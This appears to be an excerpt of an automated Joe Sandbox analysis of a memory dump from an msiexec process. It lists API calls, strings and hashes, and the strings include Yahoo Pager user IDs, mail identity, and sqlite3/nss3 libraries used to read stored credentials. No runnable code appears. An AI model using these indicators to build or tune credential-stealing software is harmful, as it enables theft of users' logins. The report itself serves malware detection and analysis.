                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi
                                                              • String ID: C@$mail.identity
                                                              • API String ID: 1439213657-721921413
                                                              • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                              • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                              APIs
                                                              • memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValuememset
                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                              • API String ID: 3363972335-1703613266
                                                              • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                              • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                              APIs
                                                              • memset.MSVCRT ref: 00406640
                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                              • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset$memcmp
                                                              • String ID: Ul@
                                                              • API String ID: 270934217-715280498
                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                              APIs
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                              • sprintf.MSVCRT ref: 0040B929
                                                              • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                              • sprintf.MSVCRT ref: 0040B953
                                                              • _mbscat.MSVCRT ref: 0040B966
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                              • String ID:
                                                              • API String ID: 203655857-0
                                                              • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                              • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                              • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                              • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                              APIs
                                                                • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                              Strings
                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                              • String ID: recovered %d pages from %s
                                                              • API String ID: 985450955-1623757624
                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _ultoasprintf
                                                              • String ID: %s %s %s
                                                              • API String ID: 432394123-3850900253
                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                              • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                              APIs
                                                              • memset.MSVCRT ref: 00409919
                                                              • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: N\@
                                                              • API String ID: 568519121-3851889168
                                                              • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                              • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                              • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                              • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                              APIs
                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                              • sprintf.MSVCRT ref: 0040909B
                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                              • String ID: menu_%d
                                                              • API String ID: 1129539653-2417748251
                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                              APIs
                                                              Strings
                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _msizerealloc
                                                              • String ID: failed memory resize %u to %u bytes
                                                              • API String ID: 2713192863-2134078882
                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                              APIs
                                                                • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                              • strrchr.MSVCRT ref: 00409808
                                                              • _mbscat.MSVCRT ref: 0040981D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName_mbscatstrrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 3334749609-1948609170
                                                              • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                              • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                              • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                              • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                              APIs
                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$_mbscpystrlen
                                                              • String ID: sqlite3.dll
                                                              • API String ID: 1983510840-1155512374
                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                              • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                              APIs
                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID: A4@$Server Details
                                                              • API String ID: 1096422788-4071850762
                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                              • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                              • memset.MSVCRT ref: 0042C932
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                              • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                              • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                              • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040849A
                                                              • memset.MSVCRT ref: 004084D2
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,67CE7B60,?,00000000), ref: 0040858F
                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,67CE7B60,?,00000000), ref: 004085BA
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                              • String ID:
                                                              • API String ID: 3110682361-0
                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                              • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID:
                                                              • API String ID: 3510742995-0
                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040797A
                                                              • free.MSVCRT ref: 0040799A
                                                                • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                              • free.MSVCRT ref: 004079BD
                                                              • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                              • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                              • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                              • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59